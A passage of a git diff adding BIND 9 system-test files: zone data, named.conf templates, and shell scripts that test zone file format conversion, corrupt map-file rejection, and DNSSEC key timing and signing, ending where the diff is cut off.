TEcpWeW1mJp+OujqyInMbjGRODJIYen/4kMR + wO6zW3RzrvmNIMgFag6G uXofiSwJ6YDeQ0O + 3uhPJsJ7ivpbh+w== + ) +ds DS 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 ) +$TTL 86400 ; 1 day +mx MX 10 mail +ns A 10.53.0.1 +$TTL 600 ; 10 minutes +nsec NSEC nsecnext.transfer3. NS DS RRSIG NSEC +$TTL 300 ; 5 minutes +rrsig RRSIG SOA 1 0 300 ( + 20050714214747 20050614214747 30795 . + yi/RRPAQmn6rnjDQaCqVValBa+ICF00ZldKfZSDaoew5 + mMUh83DlrrPPNeAxrzMSNzDGlJ6PfdyIFgzPn/CvthF4 + kjBUAiJTp4r2zhlaUJQ+QFo+drYXYgVJo6aA36fj ) +$TTL 86400 ; 1 day +txt TXT "this is text" diff --git a/bin/tests/system/masterformat/ns2/named.conf.in b/bin/tests/system/masterformat/ns2/named.conf.in new file mode 100644 index 0000000..c0f2987 --- /dev/null +++ b/bin/tests/system/masterformat/ns2/named.conf.in @@ -0,0 +1,63 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + pid-file "named.pid"; + listen-on port @PORT@ { 10.53.0.2; }; + listen-on-v6 { none; }; + port @PORT@; + recursion no; + notify no; + servfail-ttl 0; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "transfer1" { + type secondary; + primaries { 10.53.0.1; }; + file "transfer.db.raw"; +}; + +zone "transfer2" { + type secondary; + primaries { 10.53.0.1; }; + masterfile-format text; + file "transfer.db.txt"; +}; + +zone "transfer3" { + type secondary; + primaries { 10.53.0.1; }; + file "formerly-text.db"; +}; + +zone "transfer4" { + type secondary; + primaries { 10.53.0.1; }; + masterfile-format text; + masterfile-style full; + file "transfer.db.full"; +}; + +zone "large" { + type secondary; + primaries { 10.53.0.1; }; + masterfile-format raw; + file "large.bk"; +}; diff --git a/bin/tests/system/masterformat/ns3/named.conf.in b/bin/tests/system/masterformat/ns3/named.conf.in new file mode 100644 index 0000000..a41b7a8 --- /dev/null +++ b/bin/tests/system/masterformat/ns3/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +options { + pid-file "named.pid"; + listen-on port @PORT@ { 10.53.0.3; }; + port @PORT@; + listen-on-v6 { none; }; + recursion no; + notify no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "example" { + type primary; + masterfile-format map; + file "example.db.map"; +}; + +zone "dynamic" { + type primary; + masterfile-format map; + file "dynamic.db.map"; + allow-update { any; }; +}; diff --git a/bin/tests/system/masterformat/setup.sh b/bin/tests/system/masterformat/setup.sh new file mode 100755 index 0000000..ba2605c --- /dev/null +++ b/bin/tests/system/masterformat/setup.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf + +cp ns1/example.db ns2/ +cp ns2/formerly-text.db.in ns2/formerly-text.db +cp ns1/large.db.in ns1/large.db +awk 'END { + for (i = 0; i < 512; i++ ) { print "a TXT", i; } + for (i = 0; i < 1024; i++ ) { print "b TXT", i; } + for (i = 0; i < 2000; i++ ) { print "c TXT", i; } +}' < /dev/null >> ns1/large.db +cd ns1 && $SHELL compile.sh diff --git a/bin/tests/system/masterformat/tests.sh b/bin/tests/system/masterformat/tests.sh new file mode 100755 index 0000000..d78cf37 --- /dev/null +++ b/bin/tests/system/masterformat/tests.sh @@ -0,0 +1,357 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +status=0 +n=1 + +ismap () { + # shellcheck disable=SC2016 + $PERL -e 'binmode STDIN; + read(STDIN, $input, 8); + ($style, $version) = unpack("NN", $input); + exit 1 if ($style != 3 || $version > 1);' < "$1" + return $? +} + +israw () { + # shellcheck disable=SC2016 + $PERL -e 'binmode STDIN; + read(STDIN, $input, 8); + ($style, $version) = unpack("NN", $input); + exit 1 if ($style != 2 || $version > 1);' < "$1" + return $? +} + +isfull () { + # there should be no whitespace at the beginning of a line + if grep '^[ ][ ]*' "$1" > /dev/null 2>&1; then + return 1 + else + return 0 + fi +} + +rawversion () { + # shellcheck disable=SC2016 + $PERL -e 'binmode STDIN; + read(STDIN, $input, 8); + if (length($input) < 8) { print "not raw\n"; exit 0; }; + ($style, $version) = unpack("NN", $input); + print ($style == 2 || $style == 3 ? "$version\n" : + "not raw or map\n");' < "$1" +} + +sourceserial () { + # shellcheck disable=SC2016 + $PERL -e 'binmode STDIN; + read(STDIN, $input, 20); + if (length($input) < 20) { print "UNSET\n"; exit; }; + ($format, $version, $dumptime, $flags, $sourceserial) = + unpack("NNNNN", $input); + if ($format != 2 || $version < 1) { print "UNSET\n"; exit; }; + if ($flags & 02) { + print $sourceserial . "\n"; + } else { + print "UNSET\n"; + }' < "$1" +} + +stomp () { + # shellcheck disable=SC2016 + $PERL -e 'open(my $file, "+<", $ARGV[0]); + binmode $file; + seek($file, $ARGV[1], 0); + for (my $i = 0; $i < $ARGV[2]; $i++) { + print $file pack("C", $ARGV[3]); + } + close($file);' "$@" +} + +restart () { + sleep 1 + start_server --noclean --restart --port "${PORT}" ns3 +} + +dig_with_opts() { + "$DIG" +tcp +noauth +noadd +nosea +nostat +noquest +nocomm +nocmd -p "${PORT}" "$@" +} + +rndccmd() { + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "${CONTROLPORT}" -s "$@" +} + +status=0 + +echo_i "checking that files in raw format loaded ($n)" +ret=0 +set -- 1 2 3 +for zone in example example-explicit example-compat; do + for server in "$@"; do + for qname in ns mx a aaaa cname dname txt rrsig nsec \ + dnskey ds cdnskey cds; do + qtype="$qname" + dig_with_opts @10.53.0.${server} -q ${qname}.${zone}. -t ${qtype} + echo + done > dig.out.${zone}.${server}.test${n} + for qname in private-dnskey private-cdnskey; do + qtype=$(expr "$qname" : '.*-\(.*\)') + dig_with_opts @10.53.0.${server} -q ${qname}.${zone}. -t ${qtype} + done >> dig.out.${zone}.${server}.test${n} + done + digcomp dig.out.${zone}.1.test${n} dig.out.${zone}.2.test${n} || ret=1 + if [ "$zone" = "example" ]; then + set -- 1 2 + digcomp dig.out.${zone}.1.test${n} dig.out.${zone}.3.test${n} || ret=1 + fi +done +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking raw format versions ($n)" +ret=0 +israw ns1/example.db.raw || ret=1 +israw ns1/example.db.raw1 || ret=1 +israw ns1/example.db.compat || ret=1 +ismap ns1/example.db.map || ret=1 +[ "$(rawversion ns1/example.db.raw)" -eq 1 ] || ret=1 +[ "$(rawversion ns1/example.db.raw1)" -eq 1 ] || ret=1 +[ "$(rawversion ns1/example.db.compat)" -eq 0 ] || ret=1 +[ "$(rawversion ns1/example.db.map)" -eq 1 ] || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking source serial numbers ($n)" +ret=0 +[ "$(sourceserial ns1/example.db.raw)" = "UNSET" ] || ret=1 +[ "$(sourceserial ns1/example.db.serial.raw)" = "3333" ] || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "waiting for transfers to complete" +for i in 0 1 2 3 4 5 6 7 8 9 +do + test -f ns2/transfer.db.raw -a -f ns2/transfer.db.txt && break + sleep 1 +done + +echo_i "checking that secondary was saved in raw format by default ($n)" +ret=0 +israw ns2/transfer.db.raw || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that secondary was saved in text format when configured ($n)" +ret=0 +israw ns2/transfer.db.txt && ret=1 +isfull ns2/transfer.db.txt && ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that secondary was saved in 'full' style when configured ($n)" +ret=0 +isfull ns2/transfer.db.full > /dev/null 2>&1 || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that secondary formerly in text format is now raw ($n)" +for i in 0 1 2 3 4 5 6 7 8 9 +do + ret=0 + israw ns2/formerly-text.db > /dev/null 2>&1 || ret=1 + [ "$(rawversion ns2/formerly-text.db)" -eq 1 ] || ret=1 + [ $ret -eq 0 ] && break + sleep 1 +done +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that large rdatasets loaded ($n)" +for i in 0 1 2 3 4 5 6 7 8 9 +do +ret=0 +for a in a b c +do + $DIG +tcp txt "${a}.large" @10.53.0.2 -p "${PORT}" > "dig.out.ns2.test$n" + grep "status: NOERROR" "dig.out.ns2.test$n" > /dev/null || ret=1 +done +[ $ret -eq 0 ] && break +sleep 1 +done +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking format transitions: text->raw->map->text ($n)" +ret=0 +$CHECKZONE -D -f text -F text -o baseline.txt example.nil ns1/example.db > /dev/null +$CHECKZONE -D -f text -F raw -o raw.1 example.nil baseline.txt > /dev/null +$CHECKZONE -D -f raw -F map -o map.1 example.nil raw.1 > /dev/null +$CHECKZONE -D -f map -F text -o text.1 example.nil map.1 > /dev/null +cmp -s baseline.txt text.1 || ret=0 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking format transitions: text->map->raw->text ($n)" +ret=0 +$CHECKZONE -D -f text -F map -o map.2 example.nil baseline.txt > /dev/null +$CHECKZONE -D -f map -F raw -o raw.2 example.nil map.2 > /dev/null +$CHECKZONE -D -f raw -F text -o text.2 example.nil raw.2 > /dev/null +cmp -s baseline.txt text.2 || ret=0 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking map format loading with journal file rollforward ($n)" +ret=0 +$NSUPDATE <<END > /dev/null || status=1 +server 10.53.0.3 ${PORT} +ttl 600 +update add newtext.dynamic IN TXT "added text" +update delete aaaa.dynamic +send +END +dig_with_opts @10.53.0.3 newtext.dynamic txt > "dig.out.dynamic1.ns3.test$n" +grep "added text" "dig.out.dynamic1.ns3.test$n" > /dev/null 2>&1 || ret=1 +dig_with_opts +comm @10.53.0.3 added.dynamic txt > "dig.out.dynamic2.ns3.test$n" +grep "NXDOMAIN" "dig.out.dynamic2.ns3.test$n" > /dev/null 2>&1 || ret=1 +# using "rndc halt" ensures that we don't dump the zone file +stop_server --use-rndc --halt --port ${CONTROLPORT} ns3 +restart +check_added_text() { + dig_with_opts @10.53.0.3 newtext.dynamic txt > "dig.out.dynamic3.ns3.test$n" || return 1 + grep "added text" "dig.out.dynamic3.ns3.test$n" > /dev/null || return 1 + return 0 +} +retry_quiet 10 check_added_text || ret=1 +dig_with_opts +comm @10.53.0.3 added.dynamic txt > "dig.out.dynamic4.ns3.test$n" +grep "NXDOMAIN" "dig.out.dynamic4.ns3.test$n" > /dev/null 2>&1 || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking map format file dumps correctly ($n)" +ret=0 +$NSUPDATE <<END > /dev/null || status=1 +server 10.53.0.3 ${PORT} +ttl 600 +update add moretext.dynamic IN TXT "more text" +send +END +dig_with_opts @10.53.0.3 moretext.dynamic txt > "dig.out.dynamic1.ns3.test$n" +grep "more text" "dig.out.dynamic1.ns3.test$n" > /dev/null 2>&1 || ret=1 +# using "rndc stop" will cause the zone file to flush before shutdown +stop_server --use-rndc --port ${CONTROLPORT} ns3 +rm ns3/*.jnl +restart +#shellcheck disable=SC2034 +for i in 0 1 2 3 4 5 6 7 8 9; do + lret=0 + dig_with_opts +comm @10.53.0.3 moretext.dynamic txt > "dig.out.dynamic2.ns3.test$n" + grep "more text" "dig.out.dynamic2.ns3.test$n" > /dev/null 2>&1 || lret=1 + [ $lret -eq 0 ] && break; +done +[ $lret -eq 1 ] && ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +# stomp on the file header +echo_i "checking corrupt map files fail to load (bad file header) ($n)" +ret=0 +$CHECKZONE -D -f text -F map -o map.5 example.nil baseline.txt > /dev/null +cp map.5 badmap +stomp badmap 0 32 99 +$CHECKZONE -D -f map -F text -o text.5 example.nil badmap > /dev/null +[ $? = 1 ] || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +# stomp on the file data so it hashes differently. +# these are small and subtle changes, so that the resulting file +# would appear to be a legitimate map file and would not trigger an +# assertion failure if loaded into memory, but should still fail to +# load because of a SHA1 hash mismatch. +echo_i "checking corrupt map files fail to load (bad node header) ($n)" +ret=0 +cp map.5 badmap +stomp badmap 2754 2 99 +$CHECKZONE -D -f map -F text -o text.5 example.nil badmap > /dev/null +[ $? = 1 ] || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking corrupt map files fail to load (bad node data) ($n)" +ret=0 +cp map.5 badmap +stomp badmap 2897 5 127 +$CHECKZONE -D -f map -F text -o text.5 example.nil badmap > /dev/null +[ $? = 1 ] || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking map format zone is scheduled for resigning (compilezone) ($n)" +ret=0 +rndccmd 10.53.0.1 zonestatus signed > rndc.out 2>&1 || ret=1 +grep 'next resign' rndc.out > /dev/null 2>&1 || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking map format zone is scheduled for resigning (signzone) ($n)" +ret=0 +rndccmd 10.53.0.1 freeze signed > rndc.out 2>&1 || ret=1 +(cd ns1 || exit 1; $SIGNER -S -O map -f signed.db.map -o signed signed.db > /dev/null) +rndc_reload ns1 10.53.0.1 signed +rndccmd 10.53.0.1 zonestatus signed > rndc.out 2>&1 || ret=1 +grep 'next resign' rndc.out > /dev/null 2>&1 || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +# The following test is disabled by default because it is very slow. +# It fails on Windows, because a single read() call (specifically +# the one in isc_file_mmap()) cannot process more than INT_MAX (2^31) +# bytes of data. +if [ -n "${TEST_LARGE_MAP}" ]; then + echo_i "checking map file size > 2GB can be loaded ($n)" + ret=0 + $PERL ../../startperf/mkzonefile.pl test 9000000 > text.$n + # convert to map + $CHECKZONE -D -f text -F map -o map.$n test text.$n > /dev/null || ret=1 + # check map file size is over 2GB to ensure the test is valid + size=$(ls -l map.$n | awk '{print $5}') + [ "$size" -gt 2147483648 ] || ret=1 + # convert back to text + $CHECKZONE -f map test map.$n > /dev/null || ret=1 + n=$((n+1)) + [ $ret -eq 0 ] || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/metadata/child.db b/bin/tests/system/metadata/child.db new file mode 100644 index 0000000..35fff9c --- /dev/null +++ b/bin/tests/system/metadata/child.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 20 +child.parent.nil IN SOA ns.child.parent.nil. hostmaster.parent.nil. ( + 1 ; serial + 2000 ; refresh (33 minutes 20 seconds) + 2000 ; retry (33 minutes 20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns.child.parent.nil. +$ORIGIN child.parent.nil. +$TTL 300 ; 5 minutes +ns A 10.53.0.3 diff --git a/bin/tests/system/metadata/clean.sh b/bin/tests/system/metadata/clean.sh new file mode 100644 index 0000000..58cd7ce --- /dev/null +++ b/bin/tests/system/metadata/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f K* dsset-* *.signed *.new +rm -f zsk.key ksk.key parent.ksk.key parent.zsk.key +rm -f pending.key rolling.key standby.key inact.key +rm -f prerev.key postrev.key oldstyle.key +rm -f keys sigs +rm -f tmp.out +rm -f settime1.test* settime2.test* +rm -f ns*/named.lock diff --git a/bin/tests/system/metadata/parent.db b/bin/tests/system/metadata/parent.db new file mode 100644 index 0000000..a5484e3 --- /dev/null +++ b/bin/tests/system/metadata/parent.db @@ -0,0 +1,31 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +parent.nil IN SOA ns1.parent.nil. hostmaster.parent.nil. ( + 1 ; serial + 2000 ; refresh (33 minutes 20 seconds) + 2000 ; retry (33 minutes 20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns1.parent.nil. + NS ns2.parent.nil. +$ORIGIN parent.nil. +$TTL 3600 ; 1 hour +a A 1.1.1.1 +$TTL 300 ; 5 minutes +ns1 A 10.53.0.1 +ns2 A 10.53.0.2 + +child NS ns.child +ns.child A 10.53.0.3 diff --git a/bin/tests/system/metadata/setup.sh b/bin/tests/system/metadata/setup.sh new file mode 100644 index 0000000..fd9ac60 --- /dev/null +++ b/bin/tests/system/metadata/setup.sh @@ -0,0 +1,61 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +pzone=parent.nil +czone=child.parent.nil + +echo_i "generating keys" + +# active zsk +zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $czone) +echo $zsk > zsk.key + +# not yet published or active +pending=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -P none -A none $czone) +echo $pending > pending.key + +# published but not active +standby=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -A none $czone) +echo $standby > standby.key + +# inactive +inact=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -P now-24h -A now-24h -I now $czone) +echo $inact > inact.key + +# active ksk +ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $czone) +echo $ksk > ksk.key + +# published but not YET active; will be active in 15 seconds +rolling=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $czone) +$SETTIME -A now+15s $rolling > /dev/null +echo $rolling > rolling.key + +# revoked +revoke1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $czone) +echo $revoke1 > prerev.key +revoke2=$($REVOKE $revoke1) +echo $revoke2 | sed -e 's#\./##' -e "s/\.key.*$//" > postrev.key + +pzsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $pzone) +echo $pzsk > parent.zsk.key + +pksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $pzone) +echo $pksk > parent.ksk.key + +oldstyle=$($KEYGEN -Cq -a ${DEFAULT_ALGORITHM} $pzone) +echo $oldstyle > oldstyle.key + diff --git a/bin/tests/system/metadata/tests.sh b/bin/tests/system/metadata/tests.sh new file mode 100644 index 0000000..626559d --- /dev/null +++ b/bin/tests/system/metadata/tests.sh @@ -0,0 +1,213 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +pzone=parent.nil pfile=parent.db +czone=child.parent.nil cfile=child.db +status=0 +n=1 + +echo_i "setting key timers" +$SETTIME -A now+15s $(cat rolling.key) > /dev/null + +inact=$(keyfile_to_key_id "$(cat inact.key)") +ksk=$(keyfile_to_key_id "$(cat ksk.key)") +pending=$(keyfile_to_key_id "$(cat pending.key)") +postrev=$(keyfile_to_key_id "$(cat postrev.key)") +prerev=$(keyfile_to_key_id "$(cat prerev.key)") +rolling=$(keyfile_to_key_id "$(cat rolling.key)") +standby=$(keyfile_to_key_id "$(cat standby.key)") +zsk=$(keyfile_to_key_id "$(cat zsk.key)") + +echo_i "signing zones" +$SIGNER -Sg -o $czone $cfile > /dev/null +$SIGNER -Sg -o $pzone $pfile > /dev/null + +awk '$2 ~ /RRSIG/ { + type = $3; + getline; + id = $3; + if ($4 ~ /'${czone}'/) { + print type, id + } +}' < ${cfile}.signed > sigs + +awk '$2 ~ /DNSKEY/ { + flags = $3; + while ($0 !~ /key id =/) + getline; + id = $NF; + print flags, id; +}' < ${cfile}.signed > keys + +echo_i "checking that KSK signed DNSKEY only ($n)" +ret=0 +grep "DNSKEY $ksk"'$' sigs > /dev/null || ret=1 +grep "SOA $ksk"'$' sigs > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that ZSK signed ($n)" +ret=0 +grep "SOA $zsk"'$' sigs > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that standby ZSK did not sign ($n)" +ret=0 +grep " $standby"'$' sigs > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that inactive key did not sign ($n)" +ret=0 +grep " $inact"'$' sigs > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that pending key was not published ($n)" +ret=0 +grep " $pending"'$' keys > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that standby KSK did not sign but is delegated ($n)" +ret=0 +grep " $rolling"'$' sigs > /dev/null && ret=1 +grep " $rolling"'$' keys > /dev/null || ret=1 +grep -E "DS[ ]*$rolling[ ]" ${pfile}.signed > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that key was revoked ($n)" +ret=0 +grep " $prerev"'$' keys > /dev/null && ret=1 +grep " $postrev"'$' keys > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that revoked key self-signed ($n)" +ret=0 +grep "DNSKEY $postrev"'$' sigs > /dev/null || ret=1 +grep "SOA $postrev"'$' sigs > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "waiting 20 seconds for key changes to occur" +sleep 20 + +echo_i "re-signing zone" +$SIGNER -Sg -o $czone -f ${cfile}.new ${cfile}.signed > /dev/null + +echo_i "checking that standby KSK is now active ($n)" +ret=0 +grep "DNSKEY $rolling"'$' sigs > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking update of an old-style key ($n)" +ret=0 +# printing metadata should not work with an old-style key +$SETTIME -pall $(cat oldstyle.key) > /dev/null 2>&1 && ret=1 +$SETTIME -f $(cat oldstyle.key) > /dev/null 2>&1 || ret=1 +# but now it should +$SETTIME -pall $(cat oldstyle.key) > /dev/null 2>&1 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking warning about permissions change on key with dnssec-settime ($n)" +uname=$(uname -o 2> /dev/null) +if [ Cygwin = "$uname" ]; then + echo_i "Cygwin detected, skipping" +else + ret=0 + # settime should print a warning about changing the permissions + chmod 644 $(cat oldstyle.key).private + $SETTIME -P none $(cat oldstyle.key) > settime1.test$n 2>&1 || ret=1 + grep "warning: Permissions on the file.*have changed" settime1.test$n > /dev/null 2>&1 || ret=1 + $SETTIME -P none $(cat oldstyle.key) > settime2.test$n 2>&1 || ret=1 + grep "warning: Permissions on the file.*have changed" settime2.test$n > /dev/null 2>&1 && ret=1 + n=$((n + 1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +echo_i "checking warning about delete date < inactive date with dnssec-settime ($n)" +ret=0 +# settime should print a warning about delete < inactive +$SETTIME -I now+15s -D now $(cat oldstyle.key) > tmp.out 2>&1 || ret=1 +grep "warning" tmp.out > /dev/null 2>&1 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking no warning about delete date < inactive date with dnssec-settime when delete date is unset ($n)" +ret=0 +$SETTIME -D none $(cat oldstyle.key) > tmp.out 2>&1 || ret=1 +$SETTIME -p all $(cat oldstyle.key) > tmp.out 2>&1 || ret=1 +grep "warning" tmp.out > /dev/null 2>&1 && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking warning about delete date < inactive date with dnssec-keygen ($n)" +ret=0 +# keygen should print a warning about delete < inactive +$KEYGEN -q -a ${DEFAULT_ALGORITHM} -I now+15s -D now $czone > tmp.out 2>&1 || ret=1 +grep "warning" tmp.out > /dev/null 2>&1 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking correct behavior setting activation without publication date ($n)" +ret=0 +key=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -A +1w $czone) +pub=$($SETTIME -upP $key | awk '{print $2}') +act=$($SETTIME -upA $key | awk '{print $2}') +[ $pub -eq $act ] || ret=1 +key=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -A +1w -i 1d $czone) +pub=$($SETTIME -upP $key | awk '{print $2}') +act=$($SETTIME -upA $key | awk '{print $2}') +[ $pub -lt $act ] || ret=1 +key=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -A +1w -P never $czone) +pub=$($SETTIME -upP $key | awk '{print $2}') +[ $pub = "UNSET" ] || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking calculation of dates for a successor key ($n)" +ret=0 +oldkey=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $czone) +newkey=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $czone) +$SETTIME -A -2d -I +2d $oldkey > settime1.test$n 2>&1 || ret=1 +$SETTIME -i 1d -S $oldkey $newkey > settime2.test$n 2>&1 || ret=1 +$SETTIME -pA $newkey | grep "1970" > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/mirror/README b/bin/tests/system/mirror/README new file mode 100644 index 0000000..f76b41b --- /dev/null +++ b/bin/tests/system/mirror/README @@ -0,0 +1,26 @@ +<!-- +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code 